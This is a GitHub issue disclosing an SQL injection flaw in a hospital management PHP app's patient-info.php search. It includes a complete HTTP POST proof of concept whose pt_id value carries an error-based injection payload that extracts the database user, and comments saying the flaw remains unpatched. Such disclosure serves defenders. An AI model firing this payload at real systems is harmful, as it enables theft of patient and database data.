Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SQL injection vulnerability in the Hospital Management Center search box ## #1

Closed
huclilu opened this issue Nov 15, 2022 · 4 comments
Closed

Comments

@huclilu
Copy link

huclilu commented Nov 15, 2022

SQL injection vulnerability in the Hospital Management Center search box

Build environment: Aapche2.4.39; MySQL5.7.26; PHP7.3.4

1.Vulnerability analysis

In the file patient info Php, code line 87 - pt passed by post at code line 90_ The id parameter is assigned to $pt_ Id, followed by $pt_ The ID is brought into the database for query without any filtering, mysqli_ Query returns the database connection information and the results of SQL statement execution. Because the error message is not masked, SQL injection vulnerabilities are created

  • We can use sqlmap to validate

  • Manual SQL injection proof

2.POC:

POST /patient-info.php HTTP/1.1
Host: vulhms.test
Content-Length: 160
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://vulhms.test
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://vulhms.test/patient-info.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=iljducsilkhqvpp8up2b3uv1rg
Connection: close

pt_id=1' or (select 1174 from(select count(*),concat((select user()),floor(rand(0)*2))x from information_schema.tables group by x)a) and 'ace'='ace&pt_btn=Go%21
@huclilu huclilu closed this as completed Nov 16, 2022
@Cristian-Bejan
Copy link

@huclilu Hi, was this vulnerability patched?

@huclilu
Copy link
Author

huclilu commented Nov 21, 2022

@huclilu Hi, was this vulnerability patched?

oh,guys,No, this vulnerability has not been repaired, but no one replies

@Cristian-Bejan
Copy link

@huclilu Hi, was this vulnerability patched?

oh,guys,No, this vulnerability has not been repaired, but no one replies

Thank you! I appreciate the quick reply.

@huclilu
Copy link
Author

huclilu commented Nov 21, 2022

@huclilu Hi, was this vulnerability patched?

oh,guys,No, this vulnerability has not been repaired, but no one replies

Thank you! I appreciate the quick reply.
you are welcome,have a good day!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants